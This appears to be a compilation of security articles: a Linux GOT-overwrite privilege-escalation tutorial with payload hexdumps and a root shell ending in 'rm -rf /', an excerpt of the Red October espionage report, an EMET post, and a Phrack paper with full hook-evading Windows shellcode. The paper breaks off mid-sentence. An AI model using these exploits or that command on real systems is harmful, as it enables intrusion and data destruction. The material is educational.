    memcpy(item1.data, data1, BUF_SIZE); // Whoops, did we mean MAX_SIZE?
    memcpy(item1.next, data2, MAX_SIZE); // Yes, yes we did.

    exit(-1); // Exit in shame.
}

void hax(void) {
    execl("/bin/bash", "/bin/bash", "-p", NULL);
}

void readfile(char *filename, char *buffer, int len) {
    FILE *fp;
    fp = fopen(filename, "r");
    if (fp != NULL) {
        fread(buffer, 1, len, fp);
        fclose(fp);
    }
}

int main(int argc, char **argv) {
    readfile("data1.dat", data1, BUF_SIZE);
    readfile("data2.dat", data2, BUF_SIZE);
    go();
}
$ gcc stackvuln.c -o stackvuln
$ sudo chown root:root stackvuln
$ sudo chmod +s ./stackvuln
-----------------------------------
For the purpose of this example, I have included the hax() function, which is obviously where we want to redirect execution to.
Originally I wanted to include an example using a ROP chain to call a function like system(), but I decided against it for two reasons: it is somewhat out of scope for this tutorial and would make it too hard to follow for beginners; besides that, it was quite hard to find good gadgets in a program this small. The use of this function does illustrate the point that, because of NX, we can't push our own shellcode onto the stack and execute it; we have to reuse code that is already in the program (be it a function, or a chain of ROP gadgets). Google "ROP exploitation" if you are interested in the real deal.

Our overflow happens in the go() function. It creates a circular list with two items of the 'struct item' type. The first memcpy accidentally copies too many bytes into the structure, allowing us to overwrite the "next" pointer, which is used as the destination of the second call. So, if we can overwrite the next pointer with an address of our choice, we can control where memcpy writes to. Besides that, we also control data1 and data2, because these buffers are read from a file. This data could've come from a network connection or some other input, but I chose to use files because they allow us to easily alter the payloads for demonstration purposes. So, we can write any 48 bytes we want, to any location we want. How can we use this to gain control of the program?

We are going to use a structure called the GOT/PLT. I will try to explain quickly what it is, but if you need more information there is a lot of it on the web. The .got.plt is a table of addresses that a binary uses to keep track of the location of functions that live in a library. As I explained before, ASLR makes sure that a library is mapped to a different virtual memory address every time the program runs. So the program can't use static absolute addresses to refer to functions inside these libraries, because these addresses would change every run.
So, the short version is: the binary uses a mechanism that calls a stub to calculate the real address of the function, stores it in a table, and uses that for future reference. Every time the function is called, the address inside this table (.got.plt) is used. We can abuse this by overwriting that address, so that the next time the program thinks it's calling the function that corresponds to that particular entry, it is redirected to an instruction of our choice, much like the redirection we achieved before by overwriting the return pointer.

If we look at our example, we see that exit() is called right after the calls to memcpy(). So, if we can use the arbitrary write provided by those calls to overwrite the .got.plt entry of exit(), the program will jump to the address we provide instead of the address of exit() inside libc. Which address will we use? You guessed it: the address of hax(). First, let me show you how the .got.plt is used when exit() is called:
-----------------------------------
$ cat exit.c
#include <stdlib.h>

int main(int argc, char **argv) {
    exit(0);
}
$ gcc exit.c -o exit -g
$ gdb -q ./exit
Reading symbols from /home/me/.hax/plt/exit...done.
(gdb) disas main
Dump of assembler code for function main:
   0x000000000040051c <+0>:	push   %rbp
   0x000000000040051d <+1>:	mov    %rsp,%rbp
   0x0000000000400520 <+4>:	sub    $0x10,%rsp
   0x0000000000400524 <+8>:	mov    %edi,-0x4(%rbp)
   0x0000000000400527 <+11>:	mov    %rsi,-0x10(%rbp)
   0x000000000040052b <+15>:	mov    $0x0,%edi
   0x0000000000400530 <+20>:	callq  0x400400
End of assembler dump.
(gdb) x/i 0x400400
   0x400400 <exit@plt>:	jmpq   *0x200c1a(%rip)        # 0x601020
(gdb) x/gx 0x601020
0x601020 <exit@got.plt>:	0x0000000000400406
-----------------------------------
We see at main+20 that instead of calling exit inside libc directly, 0x400400 is called, which is a stub inside the plt. It jumps to whatever address is located at 0x601020, inside the got.plt.
Now, in this case, that is an address back inside the stub again, which resolves the address of the function inside libc and replaces the entry at 0x601020 with the real address of exit. So whenever exit is called, the address at 0x601020 is used, regardless of whether the real address has been resolved yet or not. So, we need to overwrite this location with the address of the hax() function, and the program will execute that function instead of exit().

For our example vulnerability, we need to locate the entry for exit inside the .got.plt, overwrite the pointer in the structure with this address, and then fill the data2 buffer with the pointer to the hax() function. The first call will then overwrite the item1.next pointer with the pointer to the exit entry inside the got.plt, and the second call will overwrite that location with the pointer to hax(). After that, exit() is called, so our pointer is used and hax() will execute, spawning a root shell. Let's go! Oh, one more thing: because the entry for execl() is located right after the entry for exit(), and our memcpy call will copy 48 bytes, we need to make sure the execl() pointer survives, by including its original value in our payload.
-----------------------------------
(gdb) mai i sect .got.plt
Exec file:
    `/tmp/stackvuln/stackvuln', file type elf64-x86-64.
    0x00601000->0x00601050 at 0x00001000: .got.plt ALLOC LOAD DATA HAS_CONTENTS
(gdb) x/10gx 0x601000
0x601000:	0x0000000000600e28	0x0000000000000000
0x601010:	0x0000000000000000	0x0000000000400526
0x601020 <fclose@got.plt>:	0x0000000000400536	0x0000000000400546
0x601030 <memcpy@got.plt>:	0x0000000000400556	0x0000000000400566
0x601040 <exit@got.plt>:	0x0000000000400576	0x0000000000400586
(gdb) p hax
$1 = {<text variable, no debug info>} 0x40073b
-----------------------------------
Okay, so the entry for exit is at 0x601040, and hax() is at 0x40073b.
Let's construct our payloads:
-----------------------------------
$ hexdump data1.dat -vC
00000000  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000010  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000020  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000030  40 10 60 00 00 00 00 00                           |@.`.....|
00000038
$ hexdump data2.dat -vC
00000000  3b 07 40 00 00 00 00 00  86 05 40 00 00 00 00 00  |;.@.......@.....|
00000010
-----------------------------------
For the first call, we use 48 bytes of padding, then overwrite the "next" pointer with a pointer to the .got.plt entry. Remember that because we are on a little-endian architecture, the individual bytes of the address appear in reverse order. The second file starts with the pointer to hax(), which will be written over the exit() entry in the .got.plt. The second address is the entry for execl(), and contains its original value just to make sure execl() is still callable. After the two calls to memcpy, exit@plt is called and uses our hax() address from the .got.plt, which means hax() gets executed:
-----------------------------------
$ ./stackvuln
bash-4.2# whoami
root
bash-4.2# rm -rf /
-----------------------------------

Sursa: Vulnerability analysis, Security Papers, Exploit Tutorials
12. "Red October" Diplomatic Cyber Attacks Investigation

Contents

- Executive Summary
- Anatomy of the attack
  - General description
  - Step-by-step description (1st stage)
  - Step-by-step description (2nd stage)
- Timeline
- Targets
  - KSN statistics
  - Sinkhole statistics
  - KSN + sinkhole data
- C&C information

Executive Summary

In October 2012, Kaspersky Lab's Global Research & Analysis Team initiated a new threat research after a series of attacks against the computer networks of various international diplomatic service agencies. A large scale cyber-espionage network was revealed and analyzed during the investigation, which we called «Red October» (after the famous novel «The Hunt for Red October»).

This report is based on detailed technical analysis of a series of targeted attacks against diplomatic, governmental and scientific research organizations in different countries, mostly related to the region of Eastern Europe, former USSR members and countries in Central Asia. The main objective of the attackers was to gather intelligence from the compromised organizations, which included computer systems, personal mobile devices and network equipment.

The earliest evidence indicates that the cyber-espionage campaign has been active since 2007 and was still active at the time of writing (January 2013). Besides that, registration data used for the purchase of several Command & Control (C&C) servers, and unique malware filenames related to the current attackers, hint at an even earlier start of activity, dating back to May 2007.

Main Findings

Advanced Cyber-espionage Network: The attackers have been active for at least several years, focusing on diplomatic and governmental agencies of various countries across the world. Information harvested from infected networks was reused in later attacks. For example, stolen credentials were compiled into a list and used when the attackers needed to guess secret phrases in other locations.
To control the network of infected machines, the attackers created more than 60 domain names and several server hosting locations in different countries (mainly Germany and Russia). The C&C infrastructure is actually a chain of servers working as proxies and hiding the location of the 'mothership' control server.

Unique architecture: The attackers created a multi-functional kit which can quickly be extended with new intelligence-gathering features. The system is resistant to C&C server takeover and allows the attackers to recover access to infected machines using alternative communication channels.

Broad variety of targets: Besides traditional attack targets (workstations), the system is capable of stealing data from mobile devices such as smartphones (iPhone, Nokia, Windows Mobile), enterprise network equipment (Cisco) and removable disk drives (including already deleted files, via a custom file recovery procedure).

Importation of exploits: The samples we managed to find were using exploit code for vulnerabilities in Microsoft Word and Microsoft Excel that was created by other attackers and employed during different cyber attacks. The attackers left the imported exploit code untouched, perhaps to make identification harder.

Attacker identification: Based on the registration data of the C&C servers and numerous artifacts left in executables of the malware, we strongly believe that the attackers have Russian-speaking origins. The current attackers and the executables developed by them were unknown until recently, and have never been linked to any other targeted cyber attacks.
Anatomy of the attack

General description

These attacks followed the classic scenario of specific targeted attacks, consisting of two major stages:

- Initial infection
- Additional modules deployed for intelligence gathering

The malicious code was delivered via e-mail as attachments (Microsoft Excel, Word and, probably, PDF documents) which were rigged with exploit code for known security vulnerabilities in the mentioned applications. Right after the victim opened the malicious document on a vulnerable system, the embedded malicious code initiated the setup of the main component, which in turn handled further communication with the C&C servers. Next, the system received a number of additional spy modules from the C&C server, including modules to handle infection of smartphones.

The main purpose of the spying modules is to steal information. This includes files from different cryptographic systems, such as «Acid Cryptofiler» (see https://fr.wikipedia.org/wiki/Acid_Cryptofiler), which is known to be used in organizations of the European Union/European Parliament/European Commission since the summer of 2011. All gathered information is packed, encrypted and only then transferred to the C&C server.

Step-by-step description (1st stage)

During our investigation we couldn't find any e-mails used in the attacks, only top-level dropper documents. Nevertheless, based on indirect evidence, we know that the e-mails could be sent using one of the following methods:

- Using an anonymous mailbox from a free public email service provider
- Using mailboxes from already infected organizations

E-mail subject lines, as well as the text in e-mail bodies, varied depending on the target (recipient). The attached file contained the exploit code, which activated a Trojan dropper in the system. We have observed the use of at least three different exploits for previously known vulnerabilities: CVE-2009-3129 (MS Excel), CVE-2010-3333 (MS Word) and CVE-2012-0158 (MS Word).
The first attacks that used the exploit for MS Excel started in 2010, while attacks targeting the MS Word vulnerabilities appeared in the summer of 2012. Notably, the attackers used exploit code that was made public and originally came from a previously known targeted attack campaign with Chinese origins. The only thing that was changed is the executable embedded in the document; the attackers replaced it with their own code.

Full article: http://www.securelist.com/en/analysis/204792262/Red_October_Diplomatic_Cyber_Attacks_Investigation
Part II: http://www.securelist.com/en/blog/785/The_Red_October_Campaign_An_Advanced_Cyber_Espionage_Network_Targeting_Diplomatic_and_Government_Agencies
13. Enhanced Mitigation Experience Toolkit v3.5 Tech Preview

A toolkit for deploying and configuring security mitigation technologies

Version: 3.5 Tech Preview
Date published: 7/25/2012
Language: English
KB articles: KB2458544
File name: EMET Setup.msi (6.3 MB)

Download: http://www.microsoft.com/en-us/download/details.aspx?id=30424
Info: The Enhanced Mitigation Experience Toolkit
Technical details: EMET 3.5 Tech Preview leverages security mitigations from the BlueHat Prize - Security Research & Defense - Site Home - TechNet Blogs

-----------------------------------------------------

In my application list I have:
- Flash Player (+ plugin container)
- Java
- Yahoo! Messenger
- Firefox, Chrome, Opera, Internet Explorer
- Adobe Reader
- Word, Excel, PowerPoint, Outlook
- VLC, Winamp
+ Others

Edit: Don't use it with Yahoo! Messenger (at least not with all options enabled), it won't start.
14. Bypassing 3rd Party Windows Buffer Overflow Protection

==Phrack Inc.==

Volume 0x0b, Issue 0x3e, Phile #0x05 of 0x10

|=-----------------------------------------------------------------------=|
|=-----=[ Bypassing 3rd Party Windows Buffer Overflow Protection ]=------=|
|=-----------------------------------------------------------------------=|
|=-------------=[ anonymous <p62_wbo_a@author.phrack.org> ]=-------------=|
|=--------------=[ Jamie Butler <james.butler@hbgary.com> ]=-------------=|
|=-------------=[ anonymous <p62_wbo_b@author.phrack.org> ]=-------------=|

--[ Contents

1 - Introduction
2 - Stack Backtracing
3 - Evading Kernel Hooks
  3.1 - Kernel Stack Backtracing
  3.2 - Faking Stack Frames
4 - Evading Userland Hooks
  4.1 - Implementation Problems - Incomplete API Hooking
    4.1.1 - Not Hooking all API Versions
    4.1.2 - Not Hooking Deeply Enough
    4.1.3 - Not Hooking Thoroughly Enough
  4.2 - Fun With Trampolines
    4.2.1 - Patch Table Jumping
    4.2.2 - Hook Hopping
  4.3 - Repatching Win32 APIs
  4.4 - Attacking Userland Components
    4.4.1 - IAT Patching
    4.4.2 - Data Section Patching
  4.5 - Calling Syscalls Directly
  4.6 - Faking Stack Frames
5 - Conclusions

--[ 1 - Introduction

Recently, a number of commercial security systems started to offer protection against buffer overflows. This paper analyzes the protection claims and describes several techniques to bypass the buffer overflow protection.

Existing commercial systems implement a number of techniques to protect against buffer overflows. Currently, stack backtracing is the most popular one. It is also the easiest to implement and the easiest to bypass. Several commercial products such as Entercept (now NAI Entercept) and Okena (now Cisco Security Agent) implement this technique.

--[ 2 - Stack Backtracing

Most of the existing commercial security systems do not actually prevent buffer overflows but rather attempt to detect the execution of shellcode.
The most common technology used to detect shellcode is code page permission checking, which involves checking whether code is executing on a writable page of memory. This is necessary since architectures such as x86 do not support the non-executable memory bit. Some systems also perform additional checking to see whether the code's page of memory belongs to a memory mapped file section and not to an anonymous memory section.

[-----------------------------------------------------------]
page = get_page_from_addr( code_addr );
if (page->permissions & WRITABLE)
    return BUFFER_OVERFLOW;

ret = page_originates_from_file( page );
if (ret != TRUE)
    return BUFFER_OVERFLOW;
[-----------------------------------------------------------]
Pseudo code for code page permission checking

Buffer overflow protection technologies (BOPT) that rely on stack backtracing don't actually create non-executable heap and stack segments. Instead, they hook the OS and check for shellcode execution during the hooked API calls. Most operating systems can be hooked in userland or in the kernel. The next section deals with evading kernel hooks, while section 4 deals with bypassing userland hooks.

--[ 3 - Evading Kernel Hooks

When hooking the kernel, Host Intrusion Prevention Systems (HIPS) must be able to detect where a userland API call originated. Due to the heavy use of the kernel32.dll and ntdll.dll libraries, an API call is usually several stack frames away from the actual syscall trap call. For this reason, some intrusion prevention systems rely on stack backtracing to locate the original caller of a system call.

----[ 3.1 - Kernel Stack Backtracing

While stack backtracing can occur from either userland or kernel, it is far more important for the kernel components of a BOPT than for its userland components. The existing commercial BOPTs' kernel components rely entirely on stack backtracing to detect shellcode execution.
Therefore, evading a kernel hook is simply a matter of defeating the stack backtracing mechanism. Stack backtracing involves traversing stack frames and verifying that the return addresses pass the buffer overflow detection tests described above. Frequently, there is also an additional "return into libc" check, which involves checking that a return address points to an instruction immediately following a call or a jump. The basic operation of stack backtracing code, as used by a BOPT, is presented below.

[-----------------------------------------------------------]
while (is_valid_frame_pointer( ebp )) {
    ret_addr = get_ret_addr( ebp );

    if (check_code_page(ret_addr) == BUFFER_OVERFLOW)
        return BUFFER_OVERFLOW;

    if (does_not_follow_call_or_jmp_opcode(ret_addr))
        return BUFFER_OVERFLOW;

    ebp = get_next_frame( ebp );
}
[-----------------------------------------------------------]
Pseudo code for BOPT stack backtracing

When discussing how to evade stack backtracing, it is important to understand how stack backtracing works on an x86 architecture. A typical stack frame looks as follows during a function call:

     :                         :
     |-------------------------|
     | function B parameter #2 |
     |-------------------------|
     | function B parameter #1 |
     |-------------------------|
     | return EIP address      |
     |-------------------------|
     | saved EBP               |
     |=========================|
     | function A parameter #2 |
     |-------------------------|
     | function A parameter #1 |
     |-------------------------|
     | return EIP address      |
     |-------------------------|
     | saved EBP               |
     |-------------------------|
     :                         :

The EBP register points to the next stack frame. Without the EBP register it is very hard, if not impossible, to correctly identify and trace through all the stack frames. Modern compilers often omit the use of EBP as a frame pointer and use it as a general purpose register instead.
With an EBP optimization, a stack frame looks as follows during a function call:

     |-----------------------|
     | function parameter #2 |
     |-----------------------|
     | function parameter #1 |
     |-----------------------|
     | return EIP address    |
     |-----------------------|

Notice that the EBP register is not present on the stack. Without an EBP register it is not possible for the buffer overflow detection technologies to accurately perform stack backtracing. This makes their task incredibly hard as a simple return into libc style attack will bypass the protection. Simply originating an API call one layer higher than the BOPT hook defeats the detection technique.

----[ 3.2 - Faking Stack Frames

Since the stack is under complete control of the shellcode, it is possible to completely alter its contents prior to an API call. Specially crafted stack frames can be used to bypass the buffer overflow detectors. As was explained previously, the buffer overflow detector is looking for three key indicators of legitimate code: read-only page permissions, memory mapped file section and a return address pointing to an instruction immediately following a call or jmp. Since function pointers change calling semantics, BOPT do not (and cannot) check that a call or jmp actually points to the API being called. Most importantly, the BOPT cannot check return addresses beyond the last valid EBP frame pointer (it cannot stack backtrace any further). Evading a BOPT is therefore simply a matter of creating a "final" stack frame which has a valid return address. This valid return address must point to an instruction residing in a read-only memory mapped file section and immediately following a call or jmp. Provided that the dummy return address is reasonably close to a second return address, the shellcode can easily regain control.
The ideal instruction sequence to point the dummy return address to is:

[-----------------------------------------------------------]
    jmp [eax]       ; or call [eax], or another register

dummy_return:
    ...             ; some number of nops or easily
                    ; reversed instructions, e.g. inc eax
    ret             ; any return will do, e.g. ret 8
[-----------------------------------------------------------]

Bypassing kernel BOPT components is easy because they must rely on user controlled data (the stack) to determine the validity of an API call. By correctly manipulating the stack, it is possible to prematurely terminate the stack return address analysis. This stack backtracing evasion technique is also effective against userland hooks (see section 4.6).

--[ 4 - Evading Userland Hooks

Given the presence of the correct instruction sequence in a valid region of memory, it is possible to trivially bypass kernel buffer overflow protection techniques. Similar techniques can be used to bypass userland BOPT components. In addition, since the shellcode executes with the same permissions as the userland hooks, a number of other techniques can be used to evade the detection.

----[ 4.1 - Implementation Problems - Incomplete API Hooking

There are many problems with the userland based buffer overflow protection technologies. For example, they require the buffer overflow protection code to be in the code path of all attacker's calls or the shellcode execution will go undetected. Trying to determine what an attacker will do with his or her shellcode a priori is an extremely hard problem, if not an impossible one. Getting on the right path is not easy. Some of the obstacles in the way include:

a. Not accounting for both UNICODE and ANSI versions of a Win32 API call.

b. Not following the chaining nature of API calls. For example, many functions in kernel32.dll are nothing more than wrappers for other functions within kernel32.dll or ntdll.dll.

c. The constantly changing nature of the Microsoft Windows API.
--------[ 4.1.1 - Not Hooking All API Versions

A commonly encountered mistake with userland API hooking
implementations is incomplete code path coverage. In order for API
interception based products to be effective, all APIs utilized by
attackers must be hooked. This requires the buffer overflow
protection technology to hook somewhere along the code path an
attacker _has_ to take. However, as will be shown, once an attacker
has begun executing code, it becomes very difficult for third party
systems to cover all code paths. Indeed, no tested commercial buffer
overflow detector actually provided effective code path coverage.

Many Windows API functions have two versions: ANSI and UNICODE. The
ANSI function names usually end in A, and UNICODE functions end in W
because of their wide character nature. The ANSI functions are often
nothing more than wrappers that call the UNICODE version of the API.
For example, CreateFileA takes the ANSI file name that was passed as
a parameter and turns it into a UNICODE string. It then calls
CreateFileW.

Unless a vendor hooks both the UNICODE and ANSI version of the API
function, an attacker can bypass the protection mechanism by simply
calling the other version of the function. For example, Entercept 4.1
hooks LoadLibraryA, but it makes no attempt to intercept
LoadLibraryW. If a protection mechanism was only going to hook one
version of a function, it would make more sense to hook the UNICODE
version. For this particular function, Okena/CSA does a better job by
hooking LoadLibraryA, LoadLibraryW, LoadLibraryExA, and
LoadLibraryExW. Unfortunately for the third party buffer overflow
detectors, simply hooking more functions in kernel32.dll is not
enough.

--------[ 4.1.2 - Not Hooking Deeply Enough

In Windows NT, kernel32.dll acts as a wrapper for ntdll.dll, and yet
many buffer overflow detection products do not hook functions within
ntdll.dll.
This simple error is similar to not hooking both the UNICODE and ANSI
versions of a function. An attacker can simply call into ntdll.dll
directly and completely bypass all the kernel32.dll "checkpoints"
established by a buffer overflow detector. For example, NAI Entercept
tries to detect shellcode calling GetProcAddress() in kernel32.dll.
However, the shellcode can be rewritten to call
LdrGetProcedureAddress() in ntdll.dll, which will accomplish the same
goal, and at the same time never pass through the NAI Entercept hook.
Similarly, shellcode can completely bypass userland hooks altogether
and make system calls directly (see section 4.5).

--------[ 4.1.3 - Not Hooking Thoroughly Enough

The interactions between the various Win32 API functions are
byzantine, complex and difficult to understand. A vendor must make
only one mistake in order to create a window of opportunity for an
attacker.

For example, Okena/CSA and NAI Entercept both hook WinExec trying to
prevent attacker's shellcode from spawning a process. The call path
for WinExec looks like this:

    WinExec() --> CreateProcessA() --> CreateProcessInternalA()

Okena/CSA and NAI Entercept hook both WinExec() and CreateProcessA()
(see Appendix A and B). However, neither product hooks
CreateProcessInternalA() (exported by kernel32.dll). When writing a
shellcode, an attacker could find the export for
CreateProcessInternalA() and use it instead of calling WinExec().
CreateProcessA() pushes two NULLs onto the stack before calling
CreateProcessInternalA(). Thus a shellcode only needs to push two
NULLs and then call CreateProcessInternalA() directly to evade the
userland API hooks of both products.

As new DLLs and APIs are released, the complexity of Win32 API
internal interactions increases, making the problem worse. Third
party product vendors are at a severe disadvantage when implementing
their buffer overflow detection technologies and are bound to make
mistakes which can be exploited by attackers.
----[ 4.2 - Fun With Trampolines

Most Win32 API functions begin with a five byte preamble. First, EBP
is pushed onto the stack, then ESP is moved into EBP.

[-----------------------------------------------------------]
Code Bytes      Assembly

55              push ebp
8bec            mov ebp, esp
[-----------------------------------------------------------]

Both Okena/CSA and Entercept use inline function hooking. They
overwrite the first 5 bytes of a function with an immediate
unconditional jump or call. For example, this is what the first few
bytes of WinExec() look like after NAI Entercept's hooks have been
installed:

[-----------------------------------------------------------]
Code Bytes      Assembly

e8 xx xx xx xx  call xxxxxxxx
54              push esp
53              push ebx
56              push esi
57              push edi
[-----------------------------------------------------------]

Alternatively, the first few bytes could be overwritten with a jump
instruction:

[-----------------------------------------------------------]
Code Bytes      Assembly

e9 xx xx xx xx  jmp xxxxxxxx
...
[-----------------------------------------------------------]

Obviously, it is easy for shellcode to test for these and other
signatures before calling a function. If a hijacking mechanism is
detected, the shellcode can use several different techniques to
bypass the hook.

------[ 4.2.1 - Patch Table Jumping

When an API is hooked, the original preamble is saved into a table so
that the buffer overflow detector can recreate the original API after
performing its validation checks. The preamble is stored in a patch
table, which resides somewhere in the address space of an
application. When shellcode detects the presence of an API hook, it
can simply search for the patch table and make its calls to patch
table entries. This completely avoids the hook, preventing the
userland buffer overflow detector components from ever being in the
attacker's call path.
------[ 4.2.2 - Hook Hopping

Alternatively, instead of locating the patch table, shellcode can
include its own copy of the original pre-hook preamble. After
executing its own API preamble, the shellcode can transfer execution
to immediately after the API hook (function address plus five bytes).
Since Intel x86 has variable length instructions, one must take this
into account in order to land on an even instruction boundary:

[-----------------------------------------------------------]
Shellcode:
    call    WinExecPreamble

WinExecPreamble:
    push    ebp
    mov     ebp, esp
    sub     esp, 54
    jmp     WinExec+6
[-----------------------------------------------------------]

This technique will not work if another function within the call path
is also hooked. In this case, Entercept also hooks CreateProcessA(),
which WinExec() calls. Thus, to evade detection shellcode should call
CreateProcessA() using the stored copy of CreateProcessA's preamble.

----[ 4.3 - Repatching Win32 APIs

Thoroughly hooking Win32 APIs is not effective when certain
fundamental errors are made in the implementation of a userland
buffer overflow detection component. Certain implementations (NAI
Entercept) have a serious problem with the way they perform their API
hooking. In order to be able to overwrite preambles of hooked
functions, the code section for a DLL has to be made writable.
Entercept marks code sections of kernel32.dll and ntdll.dll as
writable in order to be able to modify their contents. However,
Entercept never resets the writable bit!

Due to this serious security flaw, it is possible for an attacker to
overwrite the API hook by re-injecting the original preamble code.
For the WinExec() and CreateProcessA() examples, this would require
overwriting the first 6 bytes (just to be instruction aligned) of
WinExec() and CreateProcessA() with the original preamble.
[-----------------------------------------------------------]
WinExecOverWrite:

Code Bytes      Assembly

55              push ebp
8bec            mov ebp, esp
83ec54          sub esp, 54

CreateProcessAOverWrite:

Code Bytes      Assembly

55              push ebp
8bec            mov ebp, esp
ff752c          push DWORD PTR [ebp+2c]
[-----------------------------------------------------------]

This technique will not work against properly implemented buffer
overflow detectors; however, it is very effective against NAI
Entercept. A complete shellcode example which overwrites the NAI
Entercept hooks is presented below:

[-----------------------------------------------------------]
// This sample code overwrites the preamble of WinExec and
// CreateProcessA to avoid detection. The code then
// calls WinExec with a "calc.exe" parameter.
// The code demonstrates that by overwriting function
// preambles, it is able to evade Entercept and Okena/CSA
// buffer overflow protection.

_asm
{
        pusha
        jmp     JUMPSTART

START:
        pop     ebp
        xor     eax, eax
        mov     al, 0x30
        mov     eax, fs:[eax];
        mov     eax, [eax+0xc];
        // We now have the module_item for ntdll.dll
        mov     eax, [eax+0x1c]
        // We now have the module_item for kernel32.dll
        mov     eax, [eax]
        // Image base of kernel32.dll
        mov     eax, [eax+0x8]
        movzx   ebx, word ptr [eax+3ch]
        // pe.oheader.directorydata[EXPORT=0]
        mov     esi, [eax+ebx+78h]
        lea     esi, [eax+esi+18h]
        // EBX now has the base module address
        mov     ebx, eax
        lodsd
        // ECX now has the number of function names
        mov     ecx, eax
        lodsd
        add     eax, ebx
        // EDX has addresses of functions
        mov     edx, eax
        lodsd
        // EAX has address of names
        add     eax, ebx
        // Save off the number of named functions for later
        push    ecx
        // Save off the address of the functions
        push    edx

RESETEXPORTNAMETABLE:
        xor     edx, edx

INITSTRINGTABLE:
        mov     esi, ebp
        // Beginning of string table
        inc     esi

MOVETHROUGHTABLE:
        mov     edi, [eax+edx*4]
        add     edi, ebx
        // EBX has the process base address
        xor     ecx, ecx
        mov     cl, BYTE PTR [ebp]
        test    cl, cl
        jz      DONESTRINGSEARCH

STRINGSEARCH:
        // ESI points to the function string table
        repe    cmpsb
        je      Found
        // The number of named functions is on the stack
        cmp     [esp+4], edx
        je      NOTFOUND
        inc     edx
        jmp     INITSTRINGTABLE

Found:
        pop     ecx
        shl     edx, 2
        add     edx, ecx
        mov     edi, [edx]
        add     edi, ebx
        push    edi
        push    ecx
        xor     ecx, ecx
        mov     cl, BYTE PTR [ebp]
        inc     ecx
        add     ebp, ecx
        jmp     RESETEXPORTNAMETABLE

DONESTRINGSEARCH:

OverWriteCreateProcessA:
        pop     edi
        pop     edi
        push    0x06
        pop     ecx
        inc     esi
        rep     movsb

OverWriteWinExec:
        pop     edi
        push    edi
        push    0x06
        pop     ecx
        inc     esi
        rep     movsb

CallWinExec:
        push    0x03
        push    esi
        call    [esp+8]

NOTFOUND:
        pop     edx

STRINGEXIT:
        pop     ecx
        popa;
        jmp     EXIT

JUMPSTART:
        add     esp, 0x1000
        call    START

WINEXEC:
        _emit 0x07
        _emit 'W'
        _emit 'i'
        _emit 'n'
        _emit 'E'
        _emit 'x'
        _emit 'e'
        _emit 'c'

CREATEPROCESSA:
        _emit 0x0e
        _emit 'C'
        _emit 'r'
        _emit 'e'
        _emit 'a'
        _emit 't'
        _emit 'e'
        _emit 'P'
        _emit 'r'
        _emit 'o'
        _emit 'c'
        _emit 'e'
        _emit 's'
        _emit 's'
        _emit 'A'

ENDOFTABLE:
        _emit 0x00

WinExecOverWrite:
        _emit 0x06
        _emit 0x55
        _emit 0x8b
        _emit 0xec
        _emit 0x83
        _emit 0xec
        _emit 0x54

CreateProcessAOverWrite:
        _emit 0x06
        _emit 0x55
        _emit 0x8b
        _emit 0xec
        _emit 0xff
        _emit 0x75
        _emit 0x2c

COMMAND:
        _emit 'c'
        _emit 'a'
        _emit 'l'
        _emit 'c'
        _emit '.'
        _emit 'e'
        _emit 'x'
        _emit 'e'
        _emit 0x00

EXIT:
        _emit 0x90
        // Normally call ExitThread or something here
        _emit 0x90
}
[-----------------------------------------------------------]

----[ 4.4 - Attacking Userland Components

While evading the hooks and techniques used by userland buffer
overflow detector components is effective, there exist other
mechanisms of bypassing the detection. Because both the shellcode and
the buffer overflow detector are executing with the same privileges
and in the same address space, it is possible for shellcode to
directly attack the buffer overflow detector userland component.
Essentially, when attacking the buffer overflow detector userland
component the attacker is attempting to subvert the mechanism used to
perform the shellcode detection check. There are only two principal
techniques for shellcode validation checking.
Either the data used for the check is determined dynamically during
each hooked API call, or the data is gathered at process start up and
then checked during each call. In either case, it is possible for an
attacker to subvert the process.

------[ 4.4.1 - IAT Patching

Rather than implementing their own versions of memory page
information functions, the commercial buffer overflow protection
products simply use the operating system APIs. In Windows NT, these
are implemented in ntdll.dll. These APIs will be imported into the
userland component (itself a DLL) via its PE Import Table. An
attacker can patch vectors within the import table to alter the
location of an API to a function supplied by the shellcode. By
supplying the function used to do the validation checking by the
buffer overflow detector, it is trivial for an attacker to evade
detection.

------[ 4.4.2 - Data Section Patching

For various reasons, a buffer overflow detector might use a pre-built
list of page permissions within the address space. When this is the
case, altering the address of the VirtualQuery() API is not
effective. To subvert the buffer overflow detector, the shellcode has
to locate and modify the data table used by the return address
validation routines. This is a fairly straightforward, although
application specific, technique for subverting buffer overflow
prevention technologies.

----[ 4.5 - Calling Syscalls Directly

As mentioned above, rather than using ntdll.dll APIs to make system
calls, it is possible for an attacker to create shellcode which makes
system calls directly. While this technique is very effective against
userland components, it obviously cannot be used to bypass kernel
based buffer overflow detectors.

To take advantage of this technique you must understand what
parameters a kernel function uses. These may not always be the same
as the parameters required by the kernel32 or ntdll API versions.
Also, you must know the system call number of the function in
question.
You can find this dynamically using a technique similar to the one
used to find function addresses. Once you have the address of the
ntdll.dll version of the function you want to call, index into the
function one byte and read the following DWORD. This is the system
call number in the system call table for the function. This is a
common trick used by rootkit developers.

Here is the pseudo code for calling the NtReadFile system call
directly:

    ...
    xor     eax, eax
    // Optional Key
    push    eax
    // Optional pointer to large integer with the file offset
    push    eax
    push    Length_of_Buffer
    push    Address_of_Buffer
    // Before call make room for two DWORDs called the IoStatusBlock
    push    Address_of_IoStatusBlock
    // Optional ApcContext
    push    eax
    // Optional ApcRoutine
    push    eax
    // Optional Event
    push    eax
    // Required file handle
    push    hFile
    // EAX must contain the system call number
    mov     eax, Found_Sys_Call_Num
    // EDX needs the address of the userland stack
    lea     edx, [esp]
    // Trap into the kernel
    // (recent Windows NT versions use "sysenter" instead)
    int     2e

----[ 4.6 - Faking Stack Frames

As described in section 3.2, kernel based stack backtracing can be
bypassed using fake frames. The same techniques work against userland
based detectors. To bypass both userland and kernel backtracing,
shellcode can create a fake stack frame without the ebp register on
the stack. Since stack backtracing relies on the presence of the ebp
register to find the next stack frame, fake frames can stop
backtracing code from tracing past the fake frame.

Of course, generating a fake stack frame is not going to work when
the EIP register still points to shellcode which resides in a
writable memory segment. To bypass the protection code, shellcode
needs to use an address that lies in a non-writable memory segment.
This presents a problem since shellcode needs a way to eventually
regain control of the execution.
The trick to regaining control is to proxy the return to shellcode
through a "ret" instruction which resides in a non-writable memory
segment. A "ret" instruction can be found dynamically by searching
